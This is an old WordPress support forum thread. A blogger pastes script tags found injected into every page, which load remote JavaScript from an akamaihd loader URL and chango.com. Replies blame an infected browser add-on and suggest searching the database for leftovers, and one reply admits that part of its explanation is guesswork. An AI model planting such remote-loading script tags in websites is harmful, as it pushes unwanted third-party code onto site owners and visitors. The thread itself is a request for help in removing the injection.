Has my WP Blog been hacked? (3 posts)

  1. slocs777
    Posted 3 years ago #


    I noted when I am in html tab adding a blog this script. It seems to be on all of my pages. Any idea what it is or if I have been hacked?

    <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script id="__changoScript" type="text/javascript">// <![CDATA[
    var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();
    // ]]></script>

  2. CPC Mike
    Posted 3 years ago #

    There is a lot of information and links about removing this here:


  3. WayneM1
    Posted 3 years ago #

    I posted some information in that thread referenced in the post above. Here is an excerpt:

    This is definitely an issue with the WordPress user's computer. It's seems that this is some kind of a browser add-on/extension exploit. The WP user (could be you, or any WP user with editing rights - like a client's website if you are a developer) has an infected computer that injects this crap into anything they edit.

    If you do a search of your WP database(s) using PHPmyAdmin, you'll no doubt find some remnants of that injected crap floating around in various saved drafts and previous versions of many pages/posts.

    The first part of that is conjecture.

    The second part is fact. I have found numerous instances of that code added to saved versions of pages/posts in a client's wp database.

    So, the question remains:
    How is unwanted text being added to the wordpress pages/posts.

    My best guess at this time:
    There is some unexpected interaction between the script running in a browser with one of these addons, and the text editor script that wordpress uses to edit pages/posts.

    Any help in tracking this down would be appreciated.

Topic Closed

This topic has been closed to new replies.

About this Topic